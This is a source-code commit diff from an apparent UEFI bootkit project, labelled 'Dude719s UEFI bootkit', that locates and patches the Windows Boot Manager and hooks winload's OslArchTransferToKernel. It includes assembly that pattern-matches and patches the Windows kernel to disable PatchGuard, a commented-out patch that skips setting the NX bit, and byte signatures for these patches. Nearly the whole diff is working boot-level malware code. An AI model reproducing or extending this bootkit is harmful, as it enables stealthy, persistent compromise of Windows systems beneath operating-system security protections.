Update

UefiApplication/main.c

@@ -1,4 +1,4 @@
-//
+//
 // Basic UEFI Libraries
 //
 #include <Uefi.h>
@@ -84,15 +84,9 @@ EFI_STATUS LocateFile( IN CHAR16* ImagePath, OUT EFI_DEVICE_PATH** DevicePath )
 EFI_STATUS EFIAPI UefiMain( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE* SystemTable )
 {
 	EFI_STATUS efiStatus;
-	EFI_RUNTIME_DRIVER_PROTOCOL* RuntimeProtocol;
 	EFI_DEVICE_PATH* RuntimeDriverDevicePath = NULL;
 	EFI_HANDLE RuntimeDriverHandle = NULL;
 
-	//
-	// Print stuff out
-	//
-	Print( L"Hello World! My handle is %lx and System Table is at %p\n", ImageHandle, SystemTable );
-
 	//
 	// Locate the runtime driver
 	//
@@ -114,23 +108,10 @@ EFI_STATUS EFIAPI UefiMain( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE* Syst
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
 
-	//
-	// Check if the runtime driver is loaded
-	//
-	efiStatus = gBS->LocateProtocol( &gEfiSampleDriverProtocolGuid, NULL, &RuntimeProtocol );
-	if (EFI_ERROR( efiStatus ))
-		goto Exit;
-
-	//
-	// Print the value and exit
-	//
-	Print( L"Runtime driver is loaded: %lx\n", RuntimeProtocol->Value );
-	efiStatus = EFI_SUCCESS;
-
 Exit:
 	if (efiStatus != EFI_SUCCESS)
 	{
-		ErrorPrint( L"UEFI Runtime Driver Loader failed with status: %lx\r\n", efiStatus );
+		ErrorPrint( L"%EUEFI Runtime Driver Loader failed with status: %H%lx%N\r\n", efiStatus );
 	}
 
 	return efiStatus;

UefiDriver/drvmain.c

@@ -1,4 +1,4 @@
-#include "drv.h"
+#include "drv.h"
 
 //
 // Libraries
@@ -36,22 +36,17 @@ const UINT32 _gDxeRevision = 0x200;
 CHAR8 *gEfiCallerBaseName = "UefiDriver";
 
 // Title
-static CHAR16 *gTitle = L"-= Dude719s UEFI bootkit Runtime Dirver =-\r\n";
-static CHAR16 *gWindowsBootX64ImagePath = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";
-static EFI_HANDLE gWindowsImagehandle;
+#define BOOTKIT_TITLE1		L"\r\n ██████╗ ██╗   ██╗██████╗ ███████╗███████╗ ██╗ █████╗  " \
+							L"\r\n ██╔══██╗██║   ██║██╔══██╗██╔════╝╚════██║███║██╔══██╗ " \
+							L"\r\n ██║  ██║██║   ██║██║  ██║█████╗      ██╔╝╚██║╚██████║ " 
+#define BOOTKIT_TITLE2		L"\r\n ██║  ██║██║   ██║██║  ██║██╔══╝     ██╔╝  ██║ ╚═══██║ " \
+							L"\r\n ██████╔╝╚██████╔╝██████╔╝███████╗   ██║   ██║ █████╔╝ " \
+							L"\r\n ╚═════╝  ╚═════╝ ╚═════╝ ╚══════╝   ╚═╝   ╚═╝ ╚════╝  "
 
+#define BOOTMGFW_EFI_PATH	L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi"
+
+static EFI_HANDLE gWindowsImagehandle;
 
-//VOID EFIAPI hkOslArchTransferToKernel( VOID* KernelParams, VOID* KiSystemStartup )
-//{
-//	// Clear the screen
-//	//gST->ConOut->ClearScreen( gST->ConOut );
-//	//Print( L"KiSystemStartup = %lx\r\n", KiSystemStartup );
-//	//UtilWaitForKey( );
-//
-//	OslArchTransferToKernelHook( KernelParams, KernelParams );
-//
-//	//oOslArchTransferToKernel( KernelParams, KiSystemStartup );
-//}
 
 //
 // Our ImgArchEfiStartBootApplication hook which takes the winload Image Base as a parameter so we can patch the kernel
@@ -177,47 +172,6 @@ EFI_STATUS PatchWindowsBootManager( IN VOID* LocalImageBase, IN EFI_HANDLE BootM
 	return EfiStatus;
 }
 
-// 
-// Try to find gWindowsBootX64ImagePath by browsing each device
-// 
-EFI_STATUS LocateWindowsBootManager( EFI_DEVICE_PATH** LoaderDevicePath )
-{
-	EFI_FILE_IO_INTERFACE *ioDevice;
-	EFI_FILE_HANDLE handleRoots, bootFile;
-	EFI_HANDLE* handleArray;
-	UINTN nbHandles, i;
-	EFI_STATUS efistatus;
-
-	*LoaderDevicePath = (EFI_DEVICE_PATH *)NULL;
-	efistatus = gBS->LocateHandleBuffer( ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &nbHandles, &handleArray );
-	if (EFI_ERROR( efistatus ))
-		return efistatus;
-
-	Print( L"\r\nNumber of UEFI Filesystem Devices: %d\r\n", nbHandles );
-
-	for (i = 0; i < nbHandles; i++)
-	{
-		efistatus = gBS->HandleProtocol( handleArray[i], &gEfiSimpleFileSystemProtocolGuid, &ioDevice );
-		if (efistatus != EFI_SUCCESS)
-			continue;
-
-		efistatus = ioDevice->OpenVolume( ioDevice, &handleRoots );
-		if (EFI_ERROR( efistatus ))
-			continue;
-
-		efistatus = handleRoots->Open( handleRoots, &bootFile, gWindowsBootX64ImagePath, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY );
-		if (!EFI_ERROR( efistatus ))
-		{
-			handleRoots->Close( bootFile );
-			*LoaderDevicePath = FileDevicePath( handleArray[i], gWindowsBootX64ImagePath );
-			Print( L"\r\nFound Windows x64 bootmgfw.efi file at \'%s\'\r\n", ConvertDevicePathToText( *LoaderDevicePath, TRUE, TRUE ) );
-			break;
-		}
-	}
-
-	return efistatus;
-}
-
 // 
 // Main entry point
 // 
@@ -237,40 +191,48 @@ EFI_STATUS EFIAPI UefiMain( IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *Syst
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
 
-	Print( gTitle );
-	Print( L"\r\nRuntime Driver handle is %lx and System Table is at %p\r\n", ImageHandle, SystemTable );
-
+	//
+	// Print stuff out
+	//
+	Print( L"\r\n\r\n" );
+	Print( L"%s", BOOTKIT_TITLE1 );
+	Print( L"%s", BOOTKIT_TITLE2 );
 	efiStatus = gBS->HandleProtocol( ImageHandle, &gEfiLoadedImageProtocolGuid, &Image );
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
-
 	UtilPrintLoadedImageInfo( Image );
 
-	Print( L"\r\nLocating Windows UEFI Boot Manager...\r\n" );
-	efiStatus = LocateWindowsBootManager( &WinBootMgrDevicePath );
+	//
+	// Locate 
+	//
+	Print( L"Locating Windows UEFI Boot Manager... " );
+	efiStatus = UtilLocateFile( BOOTMGFW_EFI_PATH, &WinBootMgrDevicePath );
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
-
+	Print( L"Found!\r\n" );
+
+	Print( L"Patching Windows Boot Manager... " );
 	efiStatus = ImageLoad( ImageHandle, WinBootMgrDevicePath, &gWindowsImagehandle );
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
-
-	Print( L"\r\nPatching Windows Boot Manager...\r\n" );
-
 	efiStatus = PatchWindowsBootManager( Image->ImageBase, gWindowsImagehandle );
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
+	Print( L"Patched!\r\n" );
 
-	Print( L"\r\nSuccessfully patched Windows Boot Manager!\r\n" );
-
-	//Print( L"\r\nPress any key to load Windows...\r\n" );
-	//UtilWaitForKey( );
+	Print( L"\r\nPress any key to load Windows...\r\n" );
+	UtilWaitForKey( );
 
 	efiStatus = ImageStart( gWindowsImagehandle );
 	if (EFI_ERROR( efiStatus ))
 		goto Exit;
 
 Exit:
+	if (efiStatus != EFI_SUCCESS)
+	{
+		ErrorPrint( L"\r\nUEFI Runtime Driver failed with status: %lx\r\n", efiStatus );
+	}
+
 	return efiStatus;
 }
 

UefiDriver/hook.asm

@@ -34,6 +34,10 @@ OslArchTransferToKernelPatchLocation dq 0
 
 ; Original OslArchTransferToKernel address
 extern oOslArchTransferToKernel:dq
+; Winload functions
+extern EfiStall:dq
+extern EfiConOutOutputString:dq
+
 
 ; Kernel patch patterns
 extern sigNxSetBit:db
@@ -117,6 +121,10 @@ OslArchTransferToKernelHook PROC
 	mov rbp, rsp
 	and rsp, 0FFFFFFFFFFFFFFF0h ; align stack
 
+	;mov rcx, 10 * 1000000 ; stall 10 seconds
+	;mov rax, EfiStall
+	;call rax
+
 	; Before we do anything lets restore the original function bytes
 restore_bytes:
 	lea rsi, OslArchTransferToKernelBackup
@@ -137,21 +145,22 @@ get_imagesize:
 	mov ebx, dword ptr [rdx + rcx + 50h]	; get SizeOfImage from OptionialHeader in PE
 
 	; Skip setting the NX bit for when we want to set executable memory in kernel
-skip_nx_bit:
-	lea rcx, sigNxSetBit
-	sub rbx, sigNxSetBitSize
-	push rdx
-	mov rax, rdx
-	mov rdx, sigNxSetBitSize
-	call find_pattern
-	cmp rax, 0
-	je OslArchTransferToKernelHook_exit
-	mov byte ptr[rax], 0EBh ; Patch 'jz short' to 'jmp short'
+;skip_nx_bit:
+;	lea rcx, sigNxSetBit
+;	sub rbx, sigNxSetBitSize
+;	push rdx
+;	mov rax, rdx
+;	mov rdx, sigNxSetBitSize
+;	call find_pattern
+;	cmp rax, 0
+;	je OslArchTransferToKernelHook_exit
+;	mov byte ptr[rax], 0EBh ; Patch 'jz short' to 'jmp short'
 
 	; Get rid of patchguard
 fuck_you_patchguard:
 	lea rcx, sigInitPatchGuard
 	sub rbx, sigInitPatchGuardSize
+	push rdx
 	mov rax, rdx
 	mov rdx, sigInitPatchGuardSize
 	call find_pattern

UefiDriver/hook.h

@@ -25,6 +25,18 @@ extern UINT8 OslArchTransferToKernelBackup[5];
 tOslArchTransferToKernel oOslArchTransferToKernel = NULL;
 extern VOID* OslArchTransferToKernelHook;
 
+//
+// Winload calls
+//
+UINT8 sigEfiStallCall[] = { 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, 0x0F, 0x31, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x8B };
+typedef INT64( EFIAPI *tEfiStall )(UINT64 MicroSeconds);
+tEfiStall EfiStall = NULL;
+
+UINT8 sigEfiConOutOutputString[] = { 0xE8, 0xCC, 0xCC, 0xCC, 0xCC, 0x85, 0xC0, 0x78, 0x05, 0x83, 0xC3, 0xFF };
+typedef INT64( EFIAPI *tEfiConOutOutputString )(VOID* ConOut, CHAR16* String);
+tEfiConOutOutputString EfiConOutOutputString = NULL;
+
+
 // 
 // Kernel patches
 //
@@ -47,7 +59,7 @@ extern VOID* OslArchTransferToKernelHook;
 // INIT:000000014075698B 0F 30                         wrmsr
 // INIT:000000014075698D B0 01                         mov     al, 1
 // INIT:000000014075698F A2 80 02 00 00 80 F7 FF FF    mov     ds:0FFFFF78000000280h, al
-UINT8 sigNxSetBit[] = { 0x74, 0xCC, 0xB9, 0x80, 0x00, 0x00, 0xC0, 0x0F, 0x32 };
+UINT8 sigNxSetBit[] = { 0x74, 0x27, 0xB9, 0x80, 0x00, 0x00, 0xC0, 0x0F, 0x32 };
 UINTN sigNxSetBitSize = sizeof( sigNxSetBit );
 
 // Skip initializing patchguard

UefiDriver/utils.c

@@ -4,6 +4,8 @@
 // Libraries
 #include <Library/DevicePathLib.h>
 #include <Library/UefiBootServicesTableLib.h>
+// Protocols
+#include <Protocol/SimpleFileSystem.h>
 
 VOID UtilPrintLoadedImageInfo( IN EFI_LOADED_IMAGE *ImageInfo )
 {
@@ -20,6 +22,41 @@ VOID UtilWaitForKey( VOID )
 	gST->ConIn->ReadKeyStroke( gST->ConIn, &key );
 }
 
+EFI_STATUS UtilLocateFile( IN CHAR16* ImagePath, OUT EFI_DEVICE_PATH** DevicePath )
+{
+	EFI_FILE_IO_INTERFACE *ioDevice;
+	EFI_FILE_HANDLE handleRoots, bootFile;
+	EFI_HANDLE* handleArray;
+	UINTN nbHandles, i;
+	EFI_STATUS efistatus;
+
+	*DevicePath = (EFI_DEVICE_PATH *)NULL;
+	efistatus = gBS->LocateHandleBuffer( ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &nbHandles, &handleArray );
+	if (EFI_ERROR( efistatus ))
+		return efistatus;
+
+	for (i = 0; i < nbHandles; i++)
+	{
+		efistatus = gBS->HandleProtocol( handleArray[i], &gEfiSimpleFileSystemProtocolGuid, &ioDevice );
+		if (EFI_ERROR( efistatus ))
+			continue;
+
+		efistatus = ioDevice->OpenVolume( ioDevice, &handleRoots );
+		if (EFI_ERROR( efistatus ))
+			continue;
+
+		efistatus = handleRoots->Open( handleRoots, &bootFile, ImagePath, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY );
+		if (!EFI_ERROR( efistatus ))
+		{
+			handleRoots->Close( bootFile );
+			*DevicePath = FileDevicePath( handleArray[i], ImagePath );
+			break;
+		}
+	}
+
+	return efistatus;
+}
+
 EFI_STATUS UtilFindPattern( IN UINT8* Pattern, IN UINT8 Wildcard, IN UINT32 PatternLength, VOID* Base, UINT32 Size, OUT VOID ** Found )
 {
 	if (Found == NULL || Pattern == NULL || Base == NULL)

UefiDriver/utils.h

@@ -16,6 +16,11 @@ VOID UtilPrintLoadedImageInfo( IN EFI_LOADED_IMAGE *ImageInfo );
 //
 VOID UtilWaitForKey( VOID );
 
+// 
+// Try to find file by browsing each device
+// 
+EFI_STATUS UtilLocateFile( IN CHAR16* ImagePath, OUT EFI_DEVICE_PATH** DevicePath );
+
 //
 // Find byte pattern starting at specified address
 //